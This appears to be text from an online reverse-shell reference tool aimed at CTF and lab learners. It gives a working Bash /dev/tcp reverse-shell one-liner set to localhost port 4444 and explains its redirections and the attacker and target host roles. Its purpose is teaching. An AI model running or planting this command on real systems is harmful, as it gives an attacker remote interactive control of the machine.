> REVSHELL_REFERENCE
Educational listener-to-target redirection protocols
CONFIGURATION_SET
Warning: Education Only
This tool is designed for Capture The Flag (CTF) preparation, authorized security labs, and educational research. Unauthorized access to computer systems is illegal and unethical.
# [!] PROTOCOL: BASH_REVERSE_SHELL
# [!] PURPOSE: EDUCATIONAL_REFERENCE_ONLY
# [!] CONFIG: LHOST=127.0.0.1, LPORT=4444
bash -i >& /dev/tcp/127.0.0.1/4444 0>&1Note: This is a structured template. Ensure proper sanitization and context before use in lab environments.
How it works
Uses Bash's internal /dev/tcp device driver to create a TCP connection. The -i flag starts an interactive shell, and >& redirects stdout and stderr to the socket. 0>&1 redirects stdin from the socket.
Use Case & Context
Commonly used in Linux environments where Bash is available and /dev/tcp support is enabled (standard in many distributions).
LHOST (Local Host)
The IP of the machine waiting for the connection (the attacker's machine).
RHOST (Remote Host)
The IP of the target machine initiating the contact.
Persistence
Shells are usually transient. Understanding how they stay open is key to learning.